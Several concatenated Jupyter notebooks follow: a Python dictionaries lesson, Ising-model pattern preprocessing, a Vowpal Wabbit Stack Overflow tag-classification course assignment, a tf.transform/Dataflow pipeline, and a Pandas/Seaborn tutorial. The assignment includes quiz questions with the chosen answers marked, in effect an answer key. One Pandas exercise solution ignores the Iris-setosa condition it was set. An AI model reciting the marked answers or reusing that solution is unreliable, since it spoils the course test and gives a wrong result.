- The code above results in a `KeyError`, because Python interprets what's in the square brackets as a dictionary key, not a sequential index. This makes sense, since dictionary keys can be integers.
## Dictionaries have properties
- Like other Python collections, dictionaries have a length property, which is the number of key:value pairs:
~~~python
len(life_exp)
~~~
## Viewing all the keys or values in a dictionary
- You can view the entire set of keys in a dictionary like this:
~~~python
life_exp.keys()
~~~
- Likewise, you can view all of the values using `.values()`:
~~~python
life_exp.values()
~~~
- You can also view both the keys and values at once, using `.items()`:
~~~python
life_exp.items()
~~~
- The output of `.items()` is more complex than just asking Python to print the dictionary, but it's organized in a way that will be useful in later lessons, for example if you want to systematically do the same thing to each item in a dictionary.
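- As a brief preview of that use, a `for` loop can step through every key:value pair returned by `.items()`:

```python
life_exp = {1900: 48.1, 1920: 56.6, 1940: 64.0}
lines = []
for year, expectancy in life_exp.items():
    # each item arrives as a (key, value) pair we can unpack
    lines.append(f'{year}: {expectancy}')
print(lines)
```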
**Skill-Testing Question:**
What Python type are the results of the `.keys()` and `.values()` methods?
## Finding a key in a dictionary
- If your dictionary is very large, it may not be feasible to visually scan through all the entries to determine if a particular key is present. You can use the `in` statement to check whether a key is in a dictionary:
~~~python
print(1900 in life_exp)
print(1800 in life_exp)
~~~
## Dictionary values can be any type
- While dictionary keys must be an immutable type, such as strings or numbers, values can be any type — including lists, or other dictionaries.
- For example, here we create a dictionary in which each key is a country name, and the value is a list of life expectancies for different years:
~~~python
intl_life_exp = {'Canada':[48.1, 56.6, 64.0, 71.0, 75.2, 79.2],
'Denmark':[51.3, 57.5, 66.1, 72.0, 74.2, 77.0],
'Egypt':[32.7, 32.6, 33.8, 46.9, 58.0, 68.7]
}
intl_life_exp['Egypt']
~~~
### Nested indexing
- `intl_life_exp` is an example of *nesting*, which we saw previously in the lesson on lists. Each dictionary entry's value is a list, which is "nested" inside the dictionary.
- Since we can index entries in a list, we can use a sequence of specifiers to access a particular element within the list for a specific country's dictionary entry:
~~~python
intl_life_exp['Denmark'][1]
~~~
### Nested dictionaries
- Using lists in the above example has the same limitation talked about at the start of this lesson: we don't know what years correspond to the values in each list.
- Using a dictionary of dictionaries solves this problem:
~~~python
intl_life_exp = {'Canada':{1900:48.1, 1920:56.6, 1940:64.0, 1960:71.0, 1980:75.2, 2000:79.2},
'Denmark':{1900:51.3, 1920:57.5, 1940:66.1},
'Egypt':{1900:32.7, 1920:32.6, 1940:33.8, 1980:58.0}
}
intl_life_exp['Egypt']
~~~
- Note that each nested dictionary is independent of the others, so you don't need to have the same keys in each dictionary.
- We can now obtain values for specific years, within specific countries, using a sequence of keys
- The order of keys goes from the outside in as you move from left to right, so `'Denmark'` comes before the year we want to access for Denmark
~~~python
intl_life_exp['Denmark'][1940]
~~~
---
## Exercises
### Practice with dictionaries
- Create a dictionary called `weekdays` in which the keys are the names of the days of the week from Monday to Friday (not including weekends), and the values are the dates of the days of the week for this week (e.g., if today is Monday, Sept 20, then your value for `Monday` would be `20`)
- Using the `weekdays` dictionary you created, print the value for `Wednesday`
### Sorting dictionaries
- Although dictionaries are not stored in an ordered fashion, it is possible to view a sorted list of dictionary keys using the `sorted()` function we learned in the previous lesson on lists. Try printing the sorted keys for `weekdays`
### Extending dictionaries
- Add key:value pairs for the weekend days to `weekdays`
### Deleting dictionary entries
- Remove the entry for `Wednesday` from the `weekdays` dictionary
- Remove the entry for 1980 from the `intl_life_exp` dictionary entry for Canada
### Checking dictionaries
- Check if the year 1940 is a key in the entry for Denmark in the `intl_life_exp` dictionary
- Check if the year 2000 is a key in the entry for Egypt in the `intl_life_exp` dictionary
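One possible solution sketch for the `weekdays` exercises (the date values here are placeholders — use the dates of the current week):
~~~python
weekdays = {'Monday': 20, 'Tuesday': 21, 'Wednesday': 22,
            'Thursday': 23, 'Friday': 24}
print(weekdays['Wednesday'])        # 22
print(sorted(weekdays))             # alphabetically sorted list of keys
weekdays['Saturday'] = 25           # extending the dictionary
weekdays['Sunday'] = 26
del weekdays['Wednesday']           # deleting an entry
print('Wednesday' in weekdays)      # False
~~~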
---
## Summary of Key Points
- Dictionaries are a special type of collection called *mappings*
- Each dictionary entry is specified as a key:value pair
- Key:value pairs are assigned to variable names within curly braces: `{}`
- Keys must be immutable types, such as strings or numbers.
- However, dictionary values can be any Python type, including lists or other dictionaries
- Dictionaries are mutable, in that one can add or delete entries, or change the value of an entry
- You can add a new dictionary entry through assignment
- However, dictionary keys cannot be renamed. Instead, you must delete the old key:value pair and create a new one
- You can delete a dictionary entry using either the `del` statement or the `.pop()` method
- Dictionaries are unordered, so you cannot access an entry based on its serial (sequential) position the way you can entries in a list
- Instead, you access values based on their keys
- The length of a dictionary is the number of key:value pairs it contains
- You can see a list of all dictionary keys or values using the `.keys()` and `.values()` methods, respectively
| github_jupyter |
# 0. Preprocessing
An initial step of turning an example into weights (energy and interaction terms for the Ising model), so that these can be used in the following Hamiltonian:
$$ H = \sum_{x, y} \sum_{i} a_i s_i^{(x, y)} + \sum_{x,y} \sum_{x', y'} \sum_{i,j} b_{ij} s_i^{(x, y)} s_j^{(x', y')} [ \text{if } (x, y) \text{ neighbors } (x', y')]$$
```
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
from collections import Counter
# it does not need to be square or anything
n_tiles = 4
pattern_sample = np.array([
[2, 0, 1, 0, 0],
[0, 0, 3, 3, 3],
[3, 3, 3, 1, 0],
[0, 1, 0, 0, 2]
])
fig, ax = plt.subplots(1, 1, figsize=(5,4))
tile_names = ['grass', 'tree', 'water', 'road']
tile_colors = ['#0c0', '#050', '#00c', '#cc6']
sns.heatmap(pattern_sample, cmap=tile_colors, linewidth=0.1, linecolor='black', ax=ax)
colorbar = ax.collections[0].colorbar
M = pattern_sample.max()
colorbar.set_ticks([(i + 0.5) * (n_tiles - 1) / n_tiles for i in range(n_tiles)])
colorbar.set_ticklabels(tile_names)
plt.show()
counts = Counter(pattern_sample.flatten())
counts.most_common()
total_tiles = len(pattern_sample.flatten())
total_tiles
tile_probs = np.array([counts[i] / total_tiles for i in range(n_tiles)])
tile_probs
# negative log-likelihood
# higher value means something is LESS likely (so it will get a higher energy/cost function)
tile_nll = - np.log(tile_probs)
tile_nll
coincidences = np.zeros((n_tiles, n_tiles))
height, width = pattern_sample.shape
# horizontal coincidences
for x in range(width - 1):
for y in range(height):
tile1 = pattern_sample[y, x]
tile2 = pattern_sample[y, x + 1]
if tile2 < tile1:
tile1, tile2 = tile2, tile1
coincidences[tile1, tile2] += 1
for x in range(width):
for y in range(height - 1):
tile1 = pattern_sample[y, x]
tile2 = pattern_sample[y + 1, x]
if tile2 < tile1:
tile1, tile2 = tile2, tile1
coincidences[tile1, tile2] += 1
# we use only the diagonal and the upper triangle (a convention, nothing more)
coincidences
coincidence_prob = coincidences / coincidences.sum()
sns.heatmap(coincidence_prob)
# impossible combinations have inf energy
coincidence_nll = -np.log(coincidence_prob)
coincidence_nll
# if we want to avoid infinities, we can add some epsilon to the probabilities
# or even better: add 0.5 to the counts
# (it is arbitrary, but 0.5 appears a lot in statistics and quantum mechanics, as the "base count")
noise = 0.5
coincidence_nll_noise = -np.log((coincidences + noise) / (coincidences + noise).sum())
sns.heatmap(coincidence_nll_noise)
```
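As a quick sanity check on these weights, here is a small helper (my own sketch, not part of the original notebook) that evaluates the Hamiltonian above for any candidate pattern, plugging the per-tile NLL in as the $a_i$ terms and the pair NLL as the $b_{ij}$ terms — patterns resembling the training sample get a lower energy:

```python
import numpy as np

def pattern_energy(pattern, tile_nll, pair_nll):
    """Sum of per-tile energies plus the energies of all horizontal/vertical neighbor pairs."""
    energy = tile_nll[pattern].sum()
    h, w = pattern.shape
    for y in range(h):
        for x in range(w):
            if x + 1 < w:  # horizontal neighbor
                a, b = sorted((pattern[y, x], pattern[y, x + 1]))
                energy += pair_nll[a, b]
            if y + 1 < h:  # vertical neighbor
                a, b = sorted((pattern[y, x], pattern[y + 1, x]))
                energy += pair_nll[a, b]
    return energy
```

Sorting each index pair respects the upper-triangle convention used above; evaluating this on `pattern_sample` with the smoothed pair NLL gives a finite baseline energy, while any pattern containing a never-observed tile pair scores higher.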
| github_jupyter |
<center>
<img src="../../img/ods_stickers.jpg">
## Open Machine Learning Course. Session #3
<center>Author: Yury Kashnitsky, research engineer at Mail.Ru Group
# <center> Assignment #8
## <center> Vowpal Wabbit for classifying question tags on Stack Overflow
## Plan
1. Introduction
2. Data description
3. Data preprocessing
4. Training and validating models
5. Conclusion
### 1. Introduction
In this assignment you will do roughly what I do every week at Mail.Ru Group: train models on a dataset of several gigabytes. The assignment can be done on Windows with Python, but I recommend working on a \*NIX system (for example, via Docker) and making active use of bash.
A bit of snobbery (sorry, but it's true): if you want to work at the world's best ML companies, you will need experience with bash under UNIX anyway.
[Web form](https://docs.google.com/forms/d/1VaxYXnmbpeP185qPk2_V_BzbeduVUVyTdLPQwSCxDGA/edit) for submitting answers.
To complete the assignment you will need Vowpal Wabbit installed (it is already in the course Docker container; see the instructions in the Wiki of our course [repository](https://github.com/Yorko/mlcourse_open)) and about 70 GB of disk space. I tested the solution not on some supercomputer but on a 2015 MacBook Pro (8 cores, 16 GB of RAM), and the heaviest model trained in about 12 minutes, so the assignment is feasible on modest hardware. If you ever plan to rent Amazon servers, though, now is a good time to try.
Helpful materials:
- an interactive CodeAcademy [tutorial](https://www.codecademy.com/en/courses/learn-the-command-line/lessons/environment/exercises/bash-profile) on UNIX command-line utilities (about an hour to an hour and a half)
- an [article](https://habrahabr.ru/post/280562/) on renting a machine on Amazon (again: not required for the assignment, but good experience if you have never done it)
### 2. Data description
We have 10 GB of Stack Overflow questions — [download](https://drive.google.com/file/d/1ZU4J3KhJDrHVMj48fROFcTsTZKorPGlG/view) and unpack the archive.
The data format is simple:<br>
<center>*question text* (words separated by spaces) TAB *question tags* (separated by spaces)
Here TAB is the tab character.
Example of the first record in the dataset:
```
!head -1 hw8_data/stackoverflow.10kk.tsv
!head -1 hw8_data/stackoverflow_10mln.tsv
```
Here we have the question text, then a tab character, and then the question tags: *css, css3* and *css-selectors*. The dataset contains 10 million such questions in total.
```
%%time
!wc -l stackoverflow_10mln.tsv
%%time
!wc -l hw8_data/stackoverflow.10kk.tsv
```
Note that I no longer want to load data of this size into RAM and, for as long as possible, will rely on efficient UNIX utilities — head, tail, wc, cat, cut, and friends.
### 3. Data preprocessing
Let's select all questions tagged *javascript, java, python, ruby, php, c++, c#, go, scala*, or *swift* and prepare a training set in Vowpal Wabbit format. We will solve a 10-class classification problem over these tags.
In general, as we can see, a question may have several tags, but we will simplify the task: for each question we keep one of the listed tags, or skip the question if it carries none of them.
That said, VW does support multilabel classification (the --multilabel_oaa argument).
<br>
<br>
Implement the data-preparation code as a separate file `preprocess.py`. It must select the lines that contain the listed tags and write them to a separate file in Vowpal Wabbit format. Details:
- the script must take command-line arguments: the input and output file paths
- lines are processed one at a time (you can use tqdm to track progress)
- if a line contains no tab characters, or more than one, consider it corrupted and skip it
- otherwise, count how many tags from the list *javascript, java, python, ruby, php, c++, c#, go, scala*, *swift* the line contains. If exactly one, write the line to the output file in VW format: `label | text`, where `label` is a number from 1 to 10 (1 — *javascript*, ... 10 — *swift*). Skip the lines where the tags of interest number more or fewer than one
- colons and vertical bars must be removed from the question text — they are special characters in VW
```
import os
from tqdm import tqdm
from time import time
import numpy as np
from sklearn.metrics import accuracy_score
```
You should end up with exactly 4389054 lines. As you can see, the 10 GB took me about a minute and a half to process.
```
!python preprocess.py hw8_data/stackoverflow.10kk.tsv hw8_data/stackoverflow.vw
!wc -l hw8_data/stackoverflow.vw
!python preprocess.py stackoverflow_10mln.tsv stackoverflow.vw
```
Split the dataset into training, validation, and test parts of equal size — 1463018 lines in each file. Do not shuffle: the first 1463018 lines go to the training part `stackoverflow_train.vw`, the last 1463018 to the test part `stackoverflow_test.vw`, and the rest to the validation part `stackoverflow_valid.vw`.
Also save the answer vectors for the validation and test sets into separate files `stackoverflow_valid_labels.txt` and `stackoverflow_test_labels.txt`.
The `head`, `tail`, `split`, `cat`, and `cut` utilities will help here.
```
#!head -1463018 hw8_data/stackoverflow.vw > hw8_data/stackoverflow_train.vw
#!tail -1463018 hw8_data/stackoverflow.vw > hw8_data/stackoverflow_test.vw
#!tail -n+1463018 hw8_data/stackoverflow.vw | head -n+1463018 > hw8_data/stackoverflow_valid.vw
#!split -l 1463018 hw8_data/stackoverflow.vw hw8_data/stack
!mv hw8_data/stackaa hw8_data/stack_train.vw
!mv hw8_data/stackab hw8_data/stack_valid.vw
!mv hw8_data/stackac hw8_data/stack_test.vw
!cut -d '|' -f 1 hw8_data/stack_valid.vw > hw8_data/stack_valid_labels.txt
!cut -d '|' -f 1 hw8_data/stack_test.vw > hw8_data/stack_test_labels.txt
```
### 4. Training and validating models
Train Vowpal Wabbit on `stackoverflow_train.vw` 9 times, iterating over the parameters passes (1,3,5) and ngram (1,2,3).
Set the remaining parameters as follows: bit_precision=28 and seed=17. Also tell VW that this is a 10-class problem.
Check the accuracy on `stackoverflow_valid.vw`. Pick the best model and evaluate its quality on `stackoverflow_test.vw`.
```
%%time
for p in [1,3,5]:
for n in [1,2,3]:
!vw --oaa 10 \
-d hw8_data/stack_train.vw \
--loss_function squared \
--passes {p} \
--ngram {n} \
-f hw8_data/stack_model_{p}_{n}.vw \
--bit_precision 28 \
--random_seed 17 \
--quiet \
        -c
print ('stack_model_{}_{}.vw is ready'.format(p,n))
%%time
for p in [1,3,5]:
for n in [1,2,3]:
!vw -i hw8_data/stack_model_{p}_{n}.vw \
-t -d hw8_data/stack_valid.vw \
-p hw8_data/stack_valid_pred_{p}_{n}.txt \
--quiet
print ('stack_valid_pred_{}_{}.txt is ready'.format(p,n))
%%time
with open('hw8_data/stack_valid_labels.txt') as valid_labels_file :
valid_labels = [float(label) for label in valid_labels_file.readlines()]
scores=[]
best_valid_score=0
for p in [1,3,5]:
for n in [1,2,3]:
with open('hw8_data/stack_valid_pred_'+str(p)+'_'+str(n)+'.txt') as pred_file:
valid_pred = [float(label) for label in pred_file.readlines()]
#if (n,p) in [(2,3),(3,5),(2,1),(1,1)]:
acc_score=accuracy_score(valid_labels, valid_pred)
scores.append(((n,p),acc_score))
if acc_score>best_valid_score:
best_valid_score=acc_score
print(n,p,round(acc_score,4))
scores.sort(key=lambda tup: tup[1],reverse=True)
print(scores)
best_valid_score
```
<font color='red'> Question 1.</font> Which combination of parameters yields the highest accuracy on the validation set `stackoverflow_valid.vw`?
- Bigrams and 3 passes over the data
- Trigrams and 5 passes over the data
- **Bigrams and 1 pass over the data** <--
- Unigrams and 1 pass over the data
Evaluate the model that is best by validation accuracy on the test set.
```
!vw -i hw8_data/stack_model_1_2.vw \
-t -d hw8_data/stack_test.vw \
-p hw8_data/stack_test_pred_1_2.txt \
--quiet
%%time
with open('hw8_data/stack_test_labels.txt') as test_labels_file :
test_labels = [float(label) for label in test_labels_file.readlines()]
with open('hw8_data/stack_test_pred_1_2.txt') as pred_file:
test_pred = [float(label) for label in pred_file.readlines()]
test_acc_score=accuracy_score(test_labels, test_pred)
print(round(test_acc_score,4))
100*round(test_acc_score,4)-100*round(best_valid_score,4)
```
<font color='red'> Question 2.</font> How do the accuracies of the best (by validation accuracy) model compare on the validation and test sets? (Here % means a percentage point, i.e. a drop from 50% to 40% is a 10% drop, not 20%.)
- About 2% lower on the test set
- About 3% lower on the test set
- **The results are nearly identical — they differ by less than 0.5%** <--
Now train VW with the parameters tuned on the validation set, on the union of the training and validation sets. Compute the accuracy on the test set.
```
!cat hw8_data/stack_train.vw hw8_data/stack_valid.vw > hw8_data/stack_merged.vw
%%time
!vw --oaa 10 \
-d hw8_data/stack_merged.vw \
--loss_function squared \
--passes 1 \
--ngram 2 \
-f hw8_data/stack_model_merged.vw \
--bit_precision 28 \
--random_seed 17 \
--quiet \
-c
%%time
!vw -i hw8_data/stack_model_merged.vw \
-t -d hw8_data/stack_test.vw \
-p hw8_data/stack_test_pred_merged.txt \
--quiet
%%time
with open('hw8_data/stack_test_labels.txt') as test_labels_file :
test_labels = [float(label) for label in test_labels_file.readlines()]
with open('hw8_data/stack_test_pred_merged.txt') as pred_file:
test_pred = [float(label) for label in pred_file.readlines()]
merged_acc_score=accuracy_score(test_labels, test_pred)
print(round(merged_acc_score,4))
100*round(merged_acc_score,4)-100*round(test_acc_score,4)
```
<font color='red'> Question 3.</font> By how many percentage points did the model's accuracy increase after training on the twice-larger dataset (training `stackoverflow_train.vw` + validation `stackoverflow_valid.vw`), compared with the model trained only on `stackoverflow_train.vw`?
- 0.1%
- **0.4%** <--
- 0.8%
- 1.2%
### 5. Conclusion
In this assignment we have only just met Vowpal Wabbit. Other things to try:
- Multilabel classification (the `multilabel_oaa` argument) — the data format here actually suits that task
- Tuning VW's parameters with hyperopt; the library's authors claim that quality should depend heavily on the learning-rate schedule parameters (`initial_t` and `power_t`). You can also test different loss functions — train logistic regression or a linear SVM
- Getting acquainted with factorization machines and their implementation in VW (the `lrq` argument)
| github_jupyter |
<h1> Preprocessing using tf.transform and Dataflow </h1>
This notebook illustrates:
<ol>
<li> Creating datasets for Machine Learning using tf.transform and Dataflow
</ol>
<p>
While Pandas is fine for experimenting, for operationalization of your workflow, it is better to do preprocessing in Apache Beam. This will also help if you need to preprocess data in flight, since Apache Beam also allows for streaming.
Apache Beam only works in Python 2 at the moment, so we're going to switch to the Python 2 kernel. In the above menu, click the dropdown arrow and select `python2`.
Then activate a Python 2 environment and install Apache Beam. Only specific combinations of TensorFlow/Beam are supported by tf.transform. So make sure to get a combo that is.
* TFT 0.8.0
* TF 1.8 or higher
* Apache Beam [GCP] 2.5.0 or higher
```
%%bash
source activate py2env
pip uninstall -y google-cloud-dataflow
conda install -y pytz==2018.4
pip install apache-beam[gcp] tensorflow_transform==0.8.0
%%bash
pip freeze | grep -e 'flow\|beam'
```
You need to restart your kernel to register the new installs before running the cells below
```
import tensorflow as tf
import apache_beam as beam
print(tf.__version__)
# change these to try this notebook out
BUCKET = 'cloud-training-demos-ml' # REPLACE WITH YOUR BUCKET NAME
PROJECT = 'cloud-training-demos' # REPLACE WITH YOUR PROJECT ID
REGION = 'us-central1'
import os
os.environ['BUCKET'] = BUCKET
os.environ['PROJECT'] = PROJECT
os.environ['REGION'] = REGION
!gcloud config set project $PROJECT
%%bash
if ! gsutil ls | grep -q gs://${BUCKET}/; then
gsutil mb -l ${REGION} gs://${BUCKET}
fi
```
<h2> Save the query from earlier </h2>
The data is natality data (record of births in the US). My goal is to predict the baby's weight given a number of factors about the pregnancy and the baby's mother. Later, we will want to split the data into training and eval datasets. The hash of the year-month will be used for that.
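As an aside, here is a minimal sketch of why a hash of the year-month makes a good split key (`assign_split` is an illustrative helper of mine, with `hashlib` standing in for BigQuery's `FARM_FINGERPRINT`): every record from the same year-month hashes to the same value, so a month never straddles the train/eval boundary, and `MOD(hashmonth, 4)` gives a stable 3:1 split.

```python
import hashlib

def assign_split(year, month):
    # Deterministic hash of the year-month key; all rows sharing a
    # year-month land in the same split, mirroring MOD(hashmonth, 4) < 3.
    h = int(hashlib.sha256('{}{}'.format(year, month).encode()).hexdigest(), 16)
    return 'train' if h % 4 < 3 else 'eval'
```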
```
query="""
SELECT
weight_pounds,
is_male,
mother_age,
mother_race,
plurality,
gestation_weeks,
mother_married,
ever_born,
cigarette_use,
alcohol_use,
FARM_FINGERPRINT(CONCAT(CAST(YEAR AS STRING), CAST(month AS STRING))) AS hashmonth
FROM
publicdata.samples.natality
WHERE year > 2000
"""
import google.datalab.bigquery as bq
df = bq.Query(query + " LIMIT 100").execute().result().to_dataframe()
df.head()
```
<h2> Create ML dataset using tf.transform and Dataflow </h2>
<p>
Let's use Cloud Dataflow to read in the BigQuery data and write it out as CSV files. Along the way, let's use tf.transform to do scaling and transforming. Using tf.transform allows us to save the metadata to ensure that the appropriate transformations get carried out during prediction as well.
<p>
Note that after you launch this, the notebook won't show you progress. Go to the GCP webconsole to the Dataflow section and monitor the running job. It took about <b>30 minutes</b> for me. If you wish to continue without doing this step, you can copy my preprocessed output:
<pre>
gsutil -m cp -r gs://cloud-training-demos/babyweight/preproc_tft gs://your-bucket/
</pre>
```
%%writefile requirements.txt
tensorflow-transform==0.8.0
import datetime
import apache_beam as beam
import tensorflow_transform as tft
from tensorflow_transform.beam import impl as beam_impl
def preprocess_tft(inputs):
import copy
import numpy as np
def center(x):
return x - tft.mean(x)
result = copy.copy(inputs) # shallow copy
result['mother_age_tft'] = center(inputs['mother_age'])
result['gestation_weeks_centered'] = tft.scale_to_0_1(inputs['gestation_weeks'])
result['mother_race_tft'] = tft.string_to_int(inputs['mother_race'])
return result
#return inputs
def cleanup(rowdict):
import copy, hashlib
CSV_COLUMNS = 'weight_pounds,is_male,mother_age,mother_race,plurality,gestation_weeks,mother_married,cigarette_use,alcohol_use'.split(',')
STR_COLUMNS = 'key,is_male,mother_race,mother_married,cigarette_use,alcohol_use'.split(',')
FLT_COLUMNS = 'weight_pounds,mother_age,plurality,gestation_weeks'.split(',')
# add any missing columns, and correct the types
def tofloat(value, ifnot):
try:
return float(value)
except (ValueError, TypeError):
return ifnot
result = {
k : str(rowdict[k]) if k in rowdict else 'None' for k in STR_COLUMNS
}
result.update({
k : tofloat(rowdict[k], -99) if k in rowdict else -99 for k in FLT_COLUMNS
})
# modify opaque numeric race code into human-readable data
races = dict(zip([1,2,3,4,5,6,7,18,28,39,48],
['White', 'Black', 'American Indian', 'Chinese',
'Japanese', 'Hawaiian', 'Filipino',
                     'Asian Indian', 'Korean', 'Samoan', 'Vietnamese']))
if 'mother_race' in rowdict and rowdict['mother_race'] in races:
result['mother_race'] = races[rowdict['mother_race']]
else:
result['mother_race'] = 'Unknown'
  # cleanup: write out only the data that we want to train on
if result['weight_pounds'] > 0 and result['mother_age'] > 0 and result['gestation_weeks'] > 0 and result['plurality'] > 0:
data = ','.join([str(result[k]) for k in CSV_COLUMNS])
result['key'] = hashlib.sha224(data).hexdigest()
yield result
def preprocess(query, in_test_mode):
import os
import os.path
import tempfile
import tensorflow as tf
from apache_beam.io import tfrecordio
from tensorflow_transform.coders import example_proto_coder
from tensorflow_transform.tf_metadata import dataset_metadata
from tensorflow_transform.tf_metadata import dataset_schema
from tensorflow_transform.beam.tft_beam_io import transform_fn_io
job_name = 'preprocess-babyweight-features' + '-' + datetime.datetime.now().strftime('%y%m%d-%H%M%S')
if in_test_mode:
import shutil
print('Launching local job ... hang on')
OUTPUT_DIR = './preproc_tft'
shutil.rmtree(OUTPUT_DIR, ignore_errors=True)
else:
print('Launching Dataflow job {} ... hang on'.format(job_name))
OUTPUT_DIR = 'gs://{0}/babyweight/preproc_tft/'.format(BUCKET)
import subprocess
subprocess.call('gsutil rm -r {}'.format(OUTPUT_DIR).split())
options = {
'staging_location': os.path.join(OUTPUT_DIR, 'tmp', 'staging'),
'temp_location': os.path.join(OUTPUT_DIR, 'tmp'),
'job_name': job_name,
'project': PROJECT,
'max_num_workers': 24,
'teardown_policy': 'TEARDOWN_ALWAYS',
'no_save_main_session': True,
'requirements_file': 'requirements.txt'
}
opts = beam.pipeline.PipelineOptions(flags=[], **options)
if in_test_mode:
RUNNER = 'DirectRunner'
else:
RUNNER = 'DataflowRunner'
# set up metadata
raw_data_schema = {
colname : dataset_schema.ColumnSchema(tf.string, [], dataset_schema.FixedColumnRepresentation())
for colname in 'key,is_male,mother_race,mother_married,cigarette_use,alcohol_use'.split(',')
}
raw_data_schema.update({
colname : dataset_schema.ColumnSchema(tf.float32, [], dataset_schema.FixedColumnRepresentation())
for colname in 'weight_pounds,mother_age,plurality,gestation_weeks'.split(',')
})
raw_data_metadata = dataset_metadata.DatasetMetadata(dataset_schema.Schema(raw_data_schema))
def read_rawdata(p, step, test_mode):
if step == 'train':
selquery = 'SELECT * FROM ({}) WHERE ABS(MOD(hashmonth, 4)) < 3'.format(query)
else:
selquery = 'SELECT * FROM ({}) WHERE ABS(MOD(hashmonth, 4)) = 3'.format(query)
if in_test_mode:
selquery = selquery + ' LIMIT 100'
#print('Processing {} data from {}'.format(step, selquery))
return (p
| '{}_read'.format(step) >> beam.io.Read(beam.io.BigQuerySource(query=selquery, use_standard_sql=True))
| '{}_cleanup'.format(step) >> beam.FlatMap(cleanup)
)
# run Beam
with beam.Pipeline(RUNNER, options=opts) as p:
with beam_impl.Context(temp_dir=os.path.join(OUTPUT_DIR, 'tmp')):
# analyze and transform training
raw_data = read_rawdata(p, 'train', in_test_mode)
raw_dataset = (raw_data, raw_data_metadata)
transformed_dataset, transform_fn = (
raw_dataset | beam_impl.AnalyzeAndTransformDataset(preprocess_tft))
transformed_data, transformed_metadata = transformed_dataset
_ = transformed_data | 'WriteTrainData' >> tfrecordio.WriteToTFRecord(
os.path.join(OUTPUT_DIR, 'train'),
coder=example_proto_coder.ExampleProtoCoder(
transformed_metadata.schema))
# transform eval data
raw_test_data = read_rawdata(p, 'eval', in_test_mode)
raw_test_dataset = (raw_test_data, raw_data_metadata)
transformed_test_dataset = (
(raw_test_dataset, transform_fn) | beam_impl.TransformDataset())
transformed_test_data, _ = transformed_test_dataset
_ = transformed_test_data | 'WriteTestData' >> tfrecordio.WriteToTFRecord(
os.path.join(OUTPUT_DIR, 'eval'),
coder=example_proto_coder.ExampleProtoCoder(
transformed_metadata.schema))
_ = (transform_fn
| 'WriteTransformFn' >>
transform_fn_io.WriteTransformFn(os.path.join(OUTPUT_DIR, 'metadata')))
job = p.run()
if in_test_mode:
job.wait_until_finish()
print("Done!")
preprocess(query, in_test_mode=False)
%%bash
gsutil ls gs://${BUCKET}/babyweight/preproc_tft/*-00000*
```
Copyright 2017 Google Inc. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License
| github_jupyter |
# CSE 6040, Fall 2015 [08]: Data analysis and visualization
In today's class, we will first introduce a data analysis tool called **Pandas**,
and then show how to visualize data using a module called **Seaborn**.
Most of the examples come from
[Pandas tutorial](http://pandas.pydata.org/pandas-docs/stable/tutorials.html)
and
[Seaborn tutorial](http://stanford.edu/~mwaskom/software/seaborn/tutorial.html).
## Part 1: Data analysis using Pandas
Pandas is pre-installed with Anaconda.
Let's try to import it.
```
import pandas as pd
```
## Create Data
The data set will consist of 5 baby names and the number of births recorded for that year (1880).
```
# The initial set of baby names and birth counts
names = ['Bob','Jessica','Mary','John','Mel']
births = [968, 155, 77, 578, 973]
```
To merge these two lists together we will use the zip function.
```
BabyDataSet = list(zip(names, births))
BabyDataSet
```
We are basically done creating the data set. We now will use the **pandas** library to export this data set into a csv file.
We will create a DataFrame object. You can think of this object holding the contents of the BabyDataSet in a format similar to an excel spreadsheet.
```
df = pd.DataFrame(data = BabyDataSet, columns=['Names', 'Births'])
df
```
Export the dataframe to a ***csv*** file. We can name the file ***births1880.csv***. The function ***to_csv*** will be used to export the file. The file will be saved in the same location of the notebook unless specified otherwise.
```
df.to_csv('births1880.csv',index=False,header=False)
```
## Get Data
To pull in the csv file, we will use the pandas function *read_csv*. Let us take a look at this function and what inputs it takes.
```
df = pd.read_csv("births1880.csv")
df
```
This brings us to the first problem of the exercise. The ***read_csv*** function treated the first record in the csv file as the header names. This is obviously not correct since the text file did not provide us with header names.
To correct this we will pass the ***header*** parameter to the *read_csv* function and set it to ***None*** (means null in python).
```
df = pd.read_csv("births1880.csv", header=None)
df
```
If we wanted to give the columns specific names, we would have to pass another parameter called ***names***. We can also omit the *header* parameter.
```
df = pd.read_csv("births1880.csv", names=['Names','Births'])
df
```
It is also possible to read in a csv file by passing an url address
Here we use the famous [Iris dataset](https://en.wikipedia.org/wiki/Iris_flower_data_set).
The data set consists of 50 samples from each of three species of Iris (Iris setosa, Iris virginica and Iris versicolor). Four features were measured from each sample: the length and the width of the sepals and petals.
```
df = pd.read_csv("https://raw.githubusercontent.com/bigmlcom/bigmler/master/data/iris.csv")
df.head(10)
```
## Analyze Data
```
# show basic statistics
df.describe()
# Select a column
df["sepal length"].head()
# select columns
df[["sepal length", "petal width"]].head()
# select rows by name
df.loc[5:10]
# select rows by position
df.iloc[5:10]
# select rows by condition
df[df["sepal length"] > 5.0]
```
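A subtlety worth calling out here: `.loc` slices by *label* and includes both endpoints, while `.iloc` slices by *position* and excludes the stop — so `df.loc[5:10]` above returns 6 rows and `df.iloc[5:10]` returns 5. A tiny self-contained illustration:

```python
import pandas as pd

tiny = pd.DataFrame({'x': [10, 20, 30, 40]})

print(len(tiny.loc[1:2]))   # 2 -- labels 1 and 2, inclusive
print(len(tiny.iloc[1:2]))  # 1 -- position 1 only, stop excluded
```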
We can get the maximum sepal length by
```
df["sepal length"].max()
```
If we want to find full information of the flower with maximum sepal length
```
df.sort_values("sepal length", ascending=False).head(1)
```
## Exercise
Print the full information of the flower whose petal length is the second shortest in the 50 Iris-setosa flowers
```
df.sort_values("petal length", ascending=True).iloc[1]
```
Pandas also has some basic plotting functions.
```
import matplotlib.pyplot as plt
%matplotlib inline
df.hist()
```
# Part 2: Visualization using Seaborn
Seaborn is not installed by default in Anaconda.
Try install it using pip: **pip install seaborn**.
```
import seaborn as sns
# make the plots to show right below the codes
%matplotlib inline
```
## Plotting univariate distributions
distplot() function will draw a histogram and fit a kernel density estimate
```
import numpy as np
x = np.random.normal(size=100)
sns.distplot(x)
import random
x = [random.normalvariate(0, 1) for i in range(0, 1000)]
sns.distplot(x)
```
## Plotting bivariate distributions
```
mean, cov = [0, 1], [(1, .5), (.5, 1)]
data = np.random.multivariate_normal(mean, cov, 200)
df = pd.DataFrame(data, columns=["x", "y"])
```
### Scatter plot
```
